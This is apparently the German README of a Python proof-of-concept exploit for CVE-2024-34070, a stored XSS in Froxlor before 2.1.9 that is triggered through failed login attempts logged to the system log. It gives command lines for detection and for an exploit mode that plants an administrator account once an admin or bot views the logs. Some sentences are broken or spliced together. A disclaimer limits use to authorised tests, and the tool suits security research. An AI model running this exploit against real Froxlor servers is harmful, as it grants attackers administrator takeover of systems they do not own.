
Proof-of-Concept-Exploit für CVE-2024-34070, ein gespeichertes XSS in Froxlor. Erkennt anfällige Instanzen, extrahiert die Version und injiziert einen Payload, um ein Administratorkonto zu erstellen.
Python-Proof-of-Concept für CVE-2024-34070, eine gespeicherte XSS-Schwachstelle in Froxlor vor 2.1.9 über fehlgeschlagene Login-Versuche, die in das Systemprotokoll geschrieben werden.
Dieses Projekt ist nur für autorisierte Sicherheitstests, CTF-Labore und Bildungszwecke bestimmt. Führe es nicht gegen Systeme aus, die dir nicht gehören oder für die du keine ausdrückliche Erlaubnis zum Testen hast. Der Exploit-Modus kann ein Administratorkonto auf der Ziel-Froxlor-Instanz erstellen.
< 2.1.9).Unauthentifizierte Erkennung:
python3 main.py --url http://240.0.0.1:8080 --check
Authentifizierte Erkennung, um die genaue Froxlor-Version zu ermitteln:
python3 main.py --url http://240.0.0.1:8080 --check --login admin --password 'password'
Exploit-Modus, der einen neuen Administrator erstellt:
python3 main.py --url http://240.0.0.1:8080 --exploit \
--new-admin abcd \
--new-password 'Abcd@@1234' \
--new-email [email protected]
Wenn ein Administrator oder ein Automatisierungs-Bot die Froxlor-Systemprotokolle liest, sollte der Verifizierungsschritt schließlich zu admin_index.php umleiten.
--check Froxlor bestätigen, aber die Verwundbarkeit nicht strikt bestimmen./admin_admins.php), sodass es gegen die Zielinstanz funktioniert, anstatt gegen eine hartkodierte Domain.